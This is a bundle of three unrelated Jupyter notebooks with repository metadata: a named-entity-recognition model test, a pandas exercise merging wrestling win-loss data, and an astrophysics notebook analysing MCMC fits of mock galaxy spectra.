/Raw versions and notes/Model_testing.ipynb
|
fe76e897066d2a5dec551d0fe70de16217e7b817
|
[] |
no_license
|
sainvo/DeepLearning_NER
|
https://github.com/sainvo/DeepLearning_NER
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 30,909 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="O26whGApdc74" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="e7771500-e93f-4ef5-b2b1-9d424032f09c"
# Test data: Never touched during training / model development, used for evaluating the final model
# !wget https://raw.githubusercontent.com/sainvo/DeepLearning_NER/master/data/test.tsv
#saved model
# !wget https://raw.githubusercontent.com/sainvo/DeepLearning_NER/master/saved_models/Adamax90.h5
# Load pretrained embeddings
# !wget -nc https://dl.fbaipublicfiles.com/fasttext/vectors-english/wiki-news-300d-1M.vec.zip
# Give -n argument so that a possible existing file isn't overwritten
# !unzip -n wiki-news-300d-1M.vec.zip
# + id="3MA3N6YJdoW3" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="4452e407-20f5-417f-8337-92fc76ab77de"
import sys
import csv
csv.field_size_limit(sys.maxsize)
# + id="5mgqPSmmdptW" colab_type="code" colab={}
token = {"word":"","entity_label":""}
def read_ontonotes(tsv_file): #
current_sent = [] # list of (word,label) lists
with open(tsv_file) as f:
tsvreader = csv.reader(f, delimiter= '\n')
for line in tsvreader:
#print(line)
if not line:
if current_sent:
yield current_sent
current_sent=[]
continue
current_sent.append(line)
else:
if current_sent:
yield current_sent
full_test_data = list(read_ontonotes('test.tsv'))
#size_ts = int(len(full_test_data)/2)
#print(size_ts)
test_data_sample = full_test_data[:500]
# + id="2_xrpyV1d2Tt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="f619bfd4-aea3-4a11-b215-d0b9ec5f7aa2"
import re
#regex for empty space chars, \t \n
tab = re.compile('[\t]')
def clean(list):
clean_data =[]
for sent in list:
clean_list = []
for item in sent:
str = ''.join(item)
#match_nl = re.match(r"\n", str)
#print(match_nl)
count_tab = re.findall(r"\t", str)
#print(count_tab)
if len(count_tab) == 1:
item = re.split("\t", str)
if item[0] != '.':
clean_list.append(item)
elif len(count_tab) > 1:
item = re.split("\n", str)
#print(item)
for i in range(len(item)):
#print(item[i])
if i == 0 or i == len(item)-1:
item[i] = '"'+item[i]
item[i] = re.split("\t", item[i])
#print(item[i])
else:
item[i] = re.split("\t", item[i])
#print(item[i])
clean_list.append(item[i])
clean_data.append(clean_list)
return clean_data
test_data_clean = clean(test_data_sample)
print(len(test_data_clean))
for item in test_data_clean[:3]:
print(item)
# + id="qogWYHhFeBby" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 54} outputId="c5d3298b-5b1b-4a60-a277-09a78ca9b7ef"
# shape into dicts per sentence
def reshape_sent2dicts(f):
data_dict = []
for item in f: # list of lists (tokens)
#print(item)
sent_text= []
sent_tags = []
for token in item:
if len(token) ==2:
sent_text.append(token[0])
sent_tags.append(token[1])
sent_dict = {'text':sent_text,'tags':sent_tags }
#print(sent_dict['text'])
#print(sent_dict['tags'])
data_dict.append(sent_dict)
return data_dict
test_data_sent = list(reshape_sent2dicts(test_data_clean[:30000]))
print(test_data_sent[:3])
# + id="u7St12VBeDQD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="a3fe5bd1-dc21-4c76-a237-f32debae6ba2"
import random
import numpy
random.seed(123)
random.shuffle(test_data_sent)
print(type(test_data_sent))
print(type(test_data_sent[0]))
test_texts=[i["text"] for i in test_data_sent]
test_labels=[i["tags"] for i in test_data_sent]
#print(type(train_texts))
#print(type(train_texts[0]))
print('Text: ', test_texts[:4])
print('Labels: ', test_labels[:4])
# + id="jMf-ISgaeRYZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 173} outputId="0f258ab1-ae05-4d8b-bfbd-55e83d72ce59"
from gensim.models import KeyedVectors
vector_model = KeyedVectors.load_word2vec_format("wiki-news-300d-1M.vec", binary=False, limit=50000)
# sort based on the index to make sure they are in the correct order
words = [k for k, v in sorted(vector_model.vocab.items(), key=lambda x: x[1].index)]
print("Words from embedding model:", len(words))
print("First 50 words:", words[:50])
# Normalize the vectors to unit length
print("Before normalization:", vector_model.get_vector("in")[:10])
vector_model.init_sims(replace=True)
print("After normalization:", vector_model.get_vector("in")[:10])
# + id="8fPUHHMseSHx" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="ef0502fa-591f-4eb7-bde8-86104fe2841e"
# Build vocabulary mappings
# Zero is used for padding in Keras, prevent using it for a normal word.
# Also reserve an index for out-of-vocabulary items.
vocabulary={
"<PAD>": 0,
"<OOV>": 1
}
for word in words: # These are words from the word2vec model
vocabulary.setdefault(word, len(vocabulary))
print("Words in vocabulary:",len(vocabulary))
inv_vocabulary = { value: key for key, value in vocabulary.items() } # invert the dictionary
# Embedding matrix
def load_pretrained_embeddings(vocab, embedding_model):
""" vocab: vocabulary from our data vectorizer, embedding_model: model loaded with gensim """
pretrained_embeddings = numpy.random.uniform(low=-0.05, high=0.05, size=(len(vocab)-1,embedding_model.vectors.shape[1]))
pretrained_embeddings = numpy.vstack((numpy.zeros(shape=(1,embedding_model.vectors.shape[1])), pretrained_embeddings))
found=0
for word,idx in vocab.items():
if word in embedding_model.vocab:
pretrained_embeddings[idx]=embedding_model.get_vector(word)
found+=1
print("Found pretrained vectors for {found} words.".format(found=found))
return pretrained_embeddings
pretrained=load_pretrained_embeddings(vocabulary, vector_model)
# + id="kth-bcYvfE2l" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 544} outputId="6dc3f27c-aca0-4c61-ea9f-58a2cbf3cd29"
#Labels
from pprint import pprint
not_letter = re.compile(r'[^a-zA-Z]')
# Label mappings
# 1) gather a set of unique labels
label_set = set()
for sentence_labels in test_labels: #loops over sentences
#print(sentence_labels)
for label in sentence_labels: #loops over labels in one sentence
# match = not_letter.match(label)
#if match or label== 'O':
# break
#else:
label_set.add(label)
# 2) index these
label_map = {}
for index, label in enumerate(label_set):
label_map[label]=index
pprint(label_map)
# + id="JgXn15G4fJAf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="8550092f-cb89-4948-e917-ebdd114cb14c"
# vectorize the labels
def label_vectorizer(train_labels,label_map):
vectorized_labels = []
for label in test_labels:
vectorized_example_label = []
for token in label:
if token in label_map:
vectorized_example_label.append(label_map[token])
vectorized_labels.append(vectorized_example_label)
vectorized_labels = numpy.array(vectorized_labels)
return vectorized_labels
vectorized_labels = label_vectorizer(test_labels,label_map)
#validation_vectorized_labels = label_vectorizer(dev_labels,label_map)
pprint(vectorized_labels[0])
# + id="wjUqBVFTe079" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="1ae13744-b9e2-4aa3-b441-210cb61d1305"
## vectorization of the text
def text_vectorizer(vocab, test_texts):
vectorized_data = [] # turn text into numbers based on our vocabulary mapping
sentence_lengths = [] # Number of tokens in each sentence
for i, one_example in enumerate(test_texts):
vectorized_example = []
for word in one_example:
vectorized_example.append(vocab.get(word, 1)) # 1 is our index for out-of-vocabulary tokens
vectorized_data.append(vectorized_example)
sentence_lengths.append(len(one_example))
vectorized_data = numpy.array(vectorized_data) # turn python list into numpy array
return vectorized_data, sentence_lengths
vectorized_data, lengths=text_vectorizer(vocabulary, test_texts)
#validation_vectorized_data, validation_lengths=text_vectorizer(vocabulary, dev_texts)
pprint(test_texts[0])
pprint(vectorized_data[0])
# + id="62LxLsa1yCuM" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="1ab9f432-2757-49eb-e0f1-43b9de9d2c08"
# padding for tensor
import tensorflow as tf
### Only needed for me, not to block the whole GPU, you don't need this stuff
#from keras.backend.tensorflow_backend import set_session
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.3
#set_session(tf.Session(config=config))
### ---end of weird stuff
from keras.preprocessing.sequence import pad_sequences
print("Old shape:", vectorized_data.shape)
vectorized_data_padded=pad_sequences(vectorized_data, padding='pre', maxlen=max(lengths))
print("New shape:", vectorized_data_padded.shape)
print("First example:")
print( vectorized_data_padded[0])
# Even with the sparse output format, the shape has to be similar to the one-hot encoding
vectorized_labels_padded=numpy.expand_dims(pad_sequences(vectorized_labels, padding='pre', maxlen=max(lengths)), -1)
print("Padded labels shape:", vectorized_labels_padded.shape)
pprint(label_map)
print("First example labels:")
pprint(vectorized_labels_padded[0])
weights = numpy.copy(vectorized_data_padded)
weights[weights > 0] = 1
print("First weight vector:")
print( weights[0])
# + id="eH1CNZPZt20e" colab_type="code" colab={}
from tensorflow.keras.models import load_model
model_EL = load_model('Adamax90.h5')
# + id="bhAgPfI_xPBD" colab_type="code" colab={}
model_EL.predict_classes(test)
| 10,665 |
/02-Matplotlib-Project/01-Stu_WinnerWrestling-Part1/Unsolved/.ipynb
|
e735aa743f580ffecb12d9912f19cea02c53d349
|
[] |
no_license
|
Fraolabebe/Matplotlib_Challenge
|
https://github.com/Fraolabebe/Matplotlib_Challenge
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 42,945 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Winning Wrestlers Entertainment
#
# In this activity you will be taking four seperate csvs that were scraped down from a wrestling database, merging them together, and then creating charts to visualize a wrestler's wins and losses over the course of four years.
#
# ### Part 1 - Macho Merging
#
# * You will likely need to perform three different merges over the course of this activity, changing the names of your columns as you go along.
# Import the necessary modules
import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats as st
import numpy as np
# +
wrestling_2013 = "../Resources/WWE-Data-2013.csv"
wrestling_2014 = "../Resources/WWE-Data-2014.csv"
wrestling_2015 = "../Resources/WWE-Data-2015.csv"
wrestling_2016 = "../Resources/WWE-Data-2016.csv"
wrestlers2013_df = pd.read_csv(wrestling_2013)
wrestlers2014_df = pd.read_csv(wrestling_2014)
wrestlers2015_df = pd.read_csv(wrestling_2015)
wrestlers2016_df = pd.read_csv(wrestling_2016)
# -
# Merge the first two datasets (2013 and 2014) on "Wrestler" so that no data is lost (should be 182 rows)
merged_df = pd.merge(wrestlers2013_df, wrestlers2014_df, how= 'outer', on= 'Wrestler')
merged_df.head()
# +
# Rename our _x columns to "2013 Wins", "2013 Losses", and "2013 Draws"
# Rename our _y columns to "2014 Wins", "2014 Losses", and "2014 Draws"
merged_df = merged_df.rename(columns={"Wins_x": "2013 Wins", "Losses_x": "2013 Losses", "Draws_x": "2013 Draws",
"Wins_y": "2014 Wins", "Losses_y": "2014 Losses", "Draws_y": "2014 Draws"})
merged_df
# -
# Merge our newly combined dataframe with the 2015 dataframe
merged_df = pd.merge(merged_df, wrestlers2015_df, how= 'outer', on= 'Wrestler')
merged_df
# Rename "wins", "losses", and "draws" to "2015 Wins", "2015 Losses", and "2015 Draws.
merged_df = merged_df.rename(columns={"Wins": "2015 Wins", "Losses": "2015 Losses", "Draws": "2015 Draws"})
merged_df
# Merge our newly combined dataframe with the 2016 dataframe
merged_df = pd.merge(merged_df, wrestlers2016_df, how= 'outer', on= 'Wrestler')
merged_df.head()
# +
# Rename "wins", "losses", and "draws" to "2016 Wins", "2016 Losses", and "2016 Draws"
merged_df = merged_df.rename(columns={"Wins": "2016 Wins", "Losses": "2016 Losses", "Draws": "2016 Draws"})
merged_df
| 2,568 |
/nb/mocha_s2_provabgs.ipynb
|
da9fb9c7774b24962051d85aedcb5b8dd9adfc94
|
[
"MIT"
] |
permissive
|
changhoonhahn/gqp_mc
|
https://github.com/changhoonhahn/gqp_mc
| 3 | 7 | null | 2020-11-28T11:53:54 | 2020-11-16T14:33:30 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 10,181,234 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: gqp
# language: python
# name: gqp
# ---
# # Mock Challenge Level 2 Spectra --- `provabgs` mocks
import os
import pickle
import numpy as np
# --- plotting ---
import corner as DFM
import matplotlib as mpl
import matplotlib.pyplot as plt
#if 'NERSC_HOST' not in os.environ.keys():
# mpl.rcParams['text.usetex'] = True
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['axes.linewidth'] = 1.5
mpl.rcParams['axes.xmargin'] = 1
mpl.rcParams['xtick.labelsize'] = 'x-large'
mpl.rcParams['xtick.major.size'] = 5
mpl.rcParams['xtick.major.width'] = 1.5
mpl.rcParams['ytick.labelsize'] = 'x-large'
mpl.rcParams['ytick.major.size'] = 5
mpl.rcParams['ytick.major.width'] = 1.5
mpl.rcParams['legend.frameon'] = False
import gqp_mc.util as UT
from provabgs import infer as Infer
from provabgs import models as Models
# # read mock spectra
# +
theta_obs = pickle.load(open('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/l2.theta.p', 'rb'))
wave_obs = np.load('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/mocha_s2.wave.npy')
flux_obs = np.load('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/mocha_s2.flux.npy')
ivar_obs = np.load('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/mocha_s2.ivar.npy')
# -
fig = plt.figure(figsize=(15,5))
sub = fig.add_subplot(111)
for f in flux_obs[:3]:
sub.plot(wave_obs, f)
sub.set_xlabel('wavelength')
sub.set_xlim(3.6e3, 1e4)
sub.set_ylim(0., 20)
# # load in MCMC chains run on cori
# +
prior = Infer.load_priors([
Infer.UniformPrior(7.5, 12.5, label='sed'),
Infer.FlatDirichletPrior(4, label='sed'), # flat dirichilet priors
Infer.UniformPrior(0., 1., label='sed'), # burst fraction
Infer.UniformPrior(1e-2, 13.27, label='sed'), # tburst
Infer.LogUniformPrior(4.5e-5, 1.5e-2, label='sed'),# uniform priors on ZH coeffb
Infer.LogUniformPrior(4.5e-5, 1.5e-2, label='sed'),# uniform priors on ZH coeff
Infer.UniformPrior(0., 3., label='sed'), # uniform priors on dust1
Infer.UniformPrior(0., 3., label='sed'), # uniform priors on dust2
Infer.UniformPrior(-2, 1, label='sed') # uniform priors on dust_index
])
m_nmf = Models.NMF(burst=True, emulator=True)
desi_mcmc = Infer.desiMCMC(model=m_nmf, prior=prior)
# -
chain_dir = os.path.join(UT.dat_dir(), 'mini_mocha', 'L2')
f_chain = lambda i: os.path.join(chain_dir, 'S2.provabgs.%i.chain.p' % i)
igals, chains = [], []
for i in range(3000):
if os.path.isfile(f_chain(i)):
igals.append(i)
chains.append(pickle.load(open(f_chain(i), 'rb')))
print(len(igals))
# examine the chains
for i, chain in zip(igals[:3], chains):
unt_theta_bf = prior.untransform(chain['theta_bestfit'])
fig = plt.figure(figsize=(10, 10))
for ii in range(unt_theta_bf.shape[0]-1):
sub = fig.add_subplot(unt_theta_bf.shape[0]-1, 1, ii+1)
for j in range(30):
unt_chain_i = desi_mcmc.prior.untransform(chain['mcmc_chain'][:,j,:])
sub.plot(unt_chain_i[:,ii], c='k', lw=0.5)
if ii == 0: sub.axhline(theta_obs['logM_fiber'][i], color='C0')
sub.axhline(unt_theta_bf[ii], color='C1')
sub.set_xlim(0,2500)
# examine the chains
for i, chain in zip(igals[:3], chains):
unt_theta_bf = prior.untransform(chain['theta_bestfit'])
unt_chain = prior.untransform(desi_mcmc._flatten_chain(chain['mcmc_chain'][:1500,:,:]))
fig = DFM.corner(unt_chain)
axes = np.array(fig.axes).reshape((unt_theta_bf.shape[0], unt_theta_bf.shape[0]))
# Loop over the histograms
for yi in range(unt_theta_bf.shape[0]):
for xi in range(yi):
ax = axes[yi, xi]
ax.axvline(unt_theta_bf[xi], color="r")
ax.axhline(unt_theta_bf[yi], color="r")
ax.plot(unt_theta_bf[xi], unt_theta_bf[yi], "sr")
# examine the chains
for i, chain in zip(igals[:10], chains):
fig = plt.figure(figsize=(6,1))
sub = fig.add_subplot(111)
sub.plot(wave_obs, flux_obs[i], c='k', lw=1)
sub.plot(chain['wavelength_obs'], chain['flux_spec_model'], c='C1', ls='--', lw=1)
sub.set_xlim(3e3, 1e4)
sub.set_ylim(0, 3*np.max(chain['flux_spec_model'][wave_obs > 5000]))
# +
flat_chains = []
logMstar_true, logMstar_inf = [], []
logSFR_true, logSFR_inf = [], []
logSSFR_true, logSSFR_inf = [], []
logZ_MW_true, logZ_MW_inf = [], []
tage_MW_true, tage_MW_inf = [], []
tauism_true, tauism_inf = [], []
for i, chain in zip(igals, chains):
flat_chain = desi_mcmc._flatten_chain(chain['mcmc_chain'][1500:,:,:])
flat_chains.append(flat_chain)
z_obs = theta_obs['redshift'][i]
logMstar_true.append(theta_obs['logM_fiber'][i])
logMstar_inf.append(flat_chain[:,0])
logSSFR_true.append(np.log10(theta_obs['sfr_1gyr'][i]) - theta_obs['logM_total'][i])
logSSFR_inf.append(np.log10(m_nmf.avgSFR(flat_chain, zred=z_obs, dt=1.0)) - flat_chain[:,0])
logSFR_true.append(np.log10(theta_obs['sfr_1gyr'][i]) - (theta_obs['logM_total'][i] - theta_obs['logM_fiber'][i]))
logSFR_inf.append(np.log10(m_nmf.avgSFR(flat_chain, zred=z_obs, dt=1.0)))
logZ_MW_true.append(np.log10(theta_obs['Z_MW'])[i])
logZ_MW_inf.append(np.log10(m_nmf.Z_MW(flat_chain, zred=z_obs)))
tage_MW_true.append(theta_obs['t_age_MW'][i])
tage_MW_inf.append(m_nmf.tage_MW(flat_chain, zred=z_obs))
tauism_true.append(theta_obs['tau_ism'][i])
tauism_inf.append(flat_chain[:,-2])
flat_chains = np.array(flat_chains)
logMstar_true = np.array(logMstar_true)
logMstar_inf = np.array(logMstar_inf)
logSSFR_true = np.array(logSSFR_true).flatten()
logSSFR_inf = np.array(logSSFR_inf)
logSFR_true = np.array(logSFR_true).flatten()
logSFR_inf = np.array(logSFR_inf)
logZ_MW_true = np.array(logZ_MW_true).flatten()
logZ_MW_inf = np.array(logZ_MW_inf)
tage_MW_true = np.array(tage_MW_true).flatten()
tage_MW_inf = np.array(tage_MW_inf)
tauism_true = np.array(tauism_true)
tauism_inf = np.array(tauism_inf)
# -
props_chain = np.stack([logMstar_inf, logSFR_inf, logZ_MW_inf, tage_MW_inf, tauism_inf], axis=2)
props_truth = np.stack([logMstar_true, logSFR_true, logZ_MW_true, tage_MW_true, tauism_true], axis=1)
# +
# save compiled chains and properties to file
# flat chains
np.save(os.path.join(chain_dir, 'S2.flat_chains.npy'), flat_chains)
# proerties
np.save(os.path.join(chain_dir, 'S2.prop_chains.npy'), props_chain)
np.save(os.path.join(chain_dir, 'S2.prop_truths.npy'), props_truth)
# -
# lets calculate the median, +/- sigma for each of the derived properties
logm_q = np.array([DFM.quantile(logMstar_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
logssfr_q = np.array([DFM.quantile(logSSFR_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
logzmw_q = np.array([DFM.quantile(logZ_MW_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
tagemw_q = np.array([DFM.quantile(tage_MW_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
tauism_q = np.array([DFM.quantile(tauism_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
# +
fig = plt.figure(figsize=(20,10))
sub = fig.add_subplot(231)
sub.errorbar(logMstar_true, logm_q[:,1],
yerr=[logm_q[:,1]-logm_q[:,0], logm_q[:,2]-logm_q[:,1]],
fmt='.C0')
sub.plot([8., 12.], [8., 12], c='k', ls='--')
sub.text(0.05, 0.95, r'$\log M_*$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.set_xlim(8., 12.)
sub.set_ylim(8., 12.)
sub = fig.add_subplot(232)
sub.errorbar(logSSFR_true, logssfr_q[:,1],
yerr=[logssfr_q[:,1]-logssfr_q[:,0], logssfr_q[:,2]-logssfr_q[:,1]],
fmt='.C0')
sub.plot([-9., -15.], [-9., -15], c='k', ls='--')
sub.text(0.05, 0.95, r'$\log {\rm SSFR}_{1Gyr}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.set_xlim(-14, -9.)
sub.set_ylim(-14, -9.)
sub = fig.add_subplot(233)
sub.errorbar(logZ_MW_true, logzmw_q[:,1],
yerr=[logzmw_q[:,1] - logzmw_q[:,0], logzmw_q[:,2] - logzmw_q[:,1]],
fmt='.C0')
sub.text(0.05, 0.95, r'$\log Z_{\rm MW}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.plot([-3., -1], [-3, -1], c='k', ls='--')
sub.set_xlim(-3., -1)
sub.set_ylim(-3., -1)
sub = fig.add_subplot(234)
sub.errorbar(tage_MW_true, tagemw_q[:,1],
yerr=[tagemw_q[:,1] - tagemw_q[:,0], tagemw_q[:,2] - tagemw_q[:,1]],
fmt='.C0')
sub.text(0.05, 0.95, r'$t_{\rm age, MW}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.plot([0., 13.2], [0., 13.2], c='k', ls='--')
sub.set_xlim(0., 13.2)
sub.set_ylim(0., 13.2)
sub = fig.add_subplot(235)
sub.errorbar(tauism_true, tauism_q[:,1],
yerr=[tauism_q[:,1] - tauism_q[:,0], tauism_q[:,2] - tauism_q[:,1]],
fmt='.C0')
sub.text(0.05, 0.95, r'$\tau_{\rm ISM}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.plot([0., 3.], [0., 3.], c='k', ls='--')
sub.set_xlim(0., 3)
sub.set_ylim(0., 3)
# -
dlogMstar = logMstar_inf - logMstar_true[:,None]
dlogSSFR = logSSFR_inf - logSSFR_true[:,None]
dlogZ_MW = logZ_MW_inf - logZ_MW_true[:,None]
dtage_MW = tage_MW_inf - tage_MW_true[:,None]
dtau_ism = tauism_inf - tauism_true[:,None]
fig = plt.figure(figsize=(12,20))
for i, dprop, prop in zip(range(4), [dlogMstar, dlogSSFR, dlogZ_MW, dtage_MW, dtau_ism], [logMstar_true, logSSFR_true, logZ_MW_true,tage_MW_true, tauism_true]):
sub = fig.add_subplot(5,1,i+1)
violins = sub.violinplot(dprop.T, positions=prop,
widths=[0.02, 0.02, 0.005, 0.01][i], showextrema=False)
for violin in violins['bodies']:
violin.set_facecolor('C0')
violin.set_alpha(1.)
sub.plot([[7., 12.], [-14., -9.], [-3, -1], [0., 13.2], [0., 3]][i], [0, 0], c='k', ls='--')
sub.set_xlim([[8., 11.], [-14., -9.], [-2.25, -1.6], [0., 13.2], [0., 3.]][i])
sub.set_ylim(-1., 1.)
for i in range(50)[::10]:
theta_deriv = np.array([logMstar_inf[i], logSSFR_inf[i]])#, logZ_MW_inf[i]])
theta_true = np.array([logMstar_true[i], logSSFR_true[i]])#, logZ_MW_true[i]])
DFM.corner(theta_deriv.T,
truths=theta_true,
range=[(9, 12), (-13, -9.)])#, (-3., -1)])
bad_ssfr = (np.abs(logSSFR_true - logssfr_q[:,1]) > 1.) #| (np.abs(logZ_MW_true - logzmw_q[:,1]) > 0.5)
logSSFR_true[bad_ssfr], logssfr_q[bad_ssfr, 1]
for i in np.arange(len(bad_ssfr))[bad_ssfr]:
fig = plt.figure(figsize=(10,3))
sub = fig.add_subplot(111)
sub.plot(wave_obs, flux_obs[igals[i]], c='k')
sub.plot(chains[i]['wavelength_obs'], chains[i]['flux_spec_model'], c='C1', label='bestfit')
sub.set_xlim(3e3, 1e4)
sub.set_ylim(0, 4*np.max(chains[i]['flux_spec_model'][wave_obs > 5000]))
if ii == 0:
sub.legend(loc='upper left', fontsize=15, frameon=True)
sub.text(0.95, 0.95, 'i=%i' % i, ha='right', va='top', transform=sub.transAxes, fontsize=20)
for i in [3]:
'''
unt_theta_bf = prior.untransform(chains[i]['theta_bestfit'])
fig = plt.figure(figsize=(10, 10))
for ii in range(unt_theta_bf.shape[0]-1):
sub = fig.add_subplot(unt_theta_bf.shape[0]-1, 1, ii+1)
for j in range(30):
unt_chain_i = desi_mcmc.prior.untransform(chains[i]['mcmc_chain'][:,j,:])
sub.plot(unt_chain_i[:,ii], c='k', lw=0.5)
if ii == 0: sub.axhline(theta_obs['logM_fiber'][igals[i]], color='C0')
sub.axhline(unt_theta_bf[ii], color='C1')
sub.set_xlim(0,2500)
unt_chain = prior.untransform(desi_mcmc._flatten_chain(chains[i]['mcmc_chain'][:1500,:,:]))
fig = DFM.corner(unt_chain, truths=unt_bf)
theta_deriv = np.array([logMstar_inf[i], logSSFR_inf[i], logZ_MW_inf[i]])
theta_true = np.array([logMstar_true[i], logSSFR_true[i], logZ_MW_true[i]])
DFM.corner(theta_deriv.T,
truths=theta_true,
range=[(9, 12), (-13, -9.), (-3., -1)])
'''
theta_i = np.zeros(len(chains[i]['theta_bestfit']))
theta_i[0] = theta_obs['logM_fiber'][igals[i]]
theta_i[1] = 0.
theta_i[2] = 0.
theta_i[3] = 1.
theta_i[4] = 0.
theta_i[5] = 0
theta_i[7] = 3e-3
theta_i[8] = 2e-3#7.84027029e-05#1e-2# 2.89134312e-03
fig = plt.figure(figsize=(10,5))
sub = fig.add_subplot(111)
sub.plot(theta_obs['t_lookback'][igals[i]], (theta_obs['sfh_disk'][igals[i]] + theta_obs['sfh_bulge'][igals[i]]) / theta_obs['dt'][igals[i]] / 1e9, c='k')
sub.plot(theta_obs['t_lookback'][igals[i]], theta_obs['sfh_disk'][igals[i]] / theta_obs['dt'][igals[i]] / 1e9, ls='--', c='k')
sub.plot(theta_obs['t_lookback'][igals[i]], theta_obs['sfh_bulge'][igals[i]] / theta_obs['dt'][igals[i]] / 1e9, ls=':', c='k')
t, sfh = m_nmf.SFH(chains[i]['theta_bestfit'], zred=theta_obs['redshift'][igals[i]])
sub.plot(0.5*(t[1:] + t[:-1]), sfh)
t, sfh = m_nmf.SFH(theta_i, zred=theta_obs['redshift'][igals[i]])
sub.plot(0.5*(t[1:] + t[:-1]), sfh)
sub.set_xlim(0., 13.7)
sub.set_yscale('log')
fig = plt.figure(figsize=(10,5))
sub = fig.add_subplot(111)
sub.plot(theta_obs['t_lookback'][igals[i]], np.log10(theta_obs['Z_disk'][igals[i]]), c='k', ls='--')
sub.plot(theta_obs['t_lookback'][igals[i]], np.log10(theta_obs['Z_bulge'][igals[i]]), c='k', ls=':')
sub.axhline(logZ_MW_true[i], color='k', linestyle='-')
t, zh = m_nmf.ZH(chains[i]['theta_bestfit'], zred=theta_obs['redshift'][igals[i]])
#theta_obs['sfh_disk'][igals[i]] / theta_obs['dt'][igals[i]] / 1e9, ls='--', c='k')
sub.plot(0.5*(t[1:] + t[:-1]), np.log10(zh))
t, zh = m_nmf.ZH(theta_i, zred=theta_obs['redshift'][igals[i]])
sub.plot(0.5*(t[1:] + t[:-1]), np.log10(zh))
sub.set_xlim(0., 13.7)
#sub.set_yscale('log')
fig = plt.figure(figsize=(10,5))
sub = fig.add_subplot(111)
w, f= m_nmf.sed(theta_i, zred=theta_obs['redshift'][igals[i]], wavelength=chains[i]['wavelength_obs'])
sub.plot(chains[i]['wavelength_obs'], chains[i]['flux_spec_obs'], c='k', label='bestfit')
sub.plot(chains[i]['wavelength_obs'], chains[i]['flux_spec_model'], c='C1', label='bestfit')
sub.plot(w, f)
sub.set_xlim(3.6e3, 1e4)
sub.set_ylim(0., 10)
# For all of the spectra we're able to reproduce $M_*$. However, for some of the spectra, we seem to be just recovering the prior for $\log{\rm SSFR}$ and $\log Z_{\rm MW}$. Lets check:
# - the bestfit spectra are good fits to the data
# - Is this due to inherent degeneracies in the model?
bad_ssfr = (logMstar_true > 9.) & (np.abs(logSSFR_true - logssfr_q[:,1]) > 1.) #| (np.abs(logZ_MW_true - logzmw_q[:,1]) > 0.5)
# +
fig = plt.figure(figsize=(20, 5))
sub = fig.add_subplot(131)
sub.errorbar(logMstar_true, logm_q[:,1],
yerr=[logm_q[:,1]-logm_q[:,0], logm_q[:,2]-logm_q[:,1]],
fmt='.C0')
sub.errorbar(logMstar_true[bad_ssfr], logm_q[bad_ssfr,1],
yerr=[logm_q[bad_ssfr,1]-logm_q[bad_ssfr,0], logm_q[bad_ssfr,2]-logm_q[bad_ssfr,1]],
fmt='.C1')
sub.plot([9., 12.], [9., 12], c='k', ls='--')
sub.set_xlim(9., 12.)
sub.set_ylim(9., 12.)
sub = fig.add_subplot(132)
sub.errorbar(logSSFR_true, logssfr_q[:,1],
yerr=[logssfr_q[:,1]-logssfr_q[:,0], logssfr_q[:,2]-logssfr_q[:,1]],
fmt='.C0')
sub.errorbar(logSSFR_true[bad_ssfr], logssfr_q[bad_ssfr,1],
yerr=[logssfr_q[bad_ssfr,1]-logssfr_q[bad_ssfr,0], logssfr_q[bad_ssfr,2]-logssfr_q[bad_ssfr,1]],
fmt='.C1')
sub.plot([-9., -15.], [-9., -15], c='k', ls='--')
sub.set_xlim(-14, -9.)
sub.set_ylim(-14, -9.)
sub = fig.add_subplot(133)
sub.errorbar(logZ_MW_true, logzmw_q[:,1],
yerr=[logzmw_q[:,1] - logzmw_q[:,0], logzmw_q[:,2] - logzmw_q[:,1]],
fmt='.C0')
sub.errorbar(logZ_MW_true[bad_ssfr], logzmw_q[bad_ssfr,1],
yerr=[logzmw_q[bad_ssfr,1] - logzmw_q[bad_ssfr,0], logzmw_q[bad_ssfr,2] - logzmw_q[bad_ssfr,1]],
fmt='.C1')
sub.plot([-3., -1], [-3, -1], c='k', ls='--')
sub.set_xlim(-3., -1)
sub.set_ylim(-3., -1)
| 16,194 |
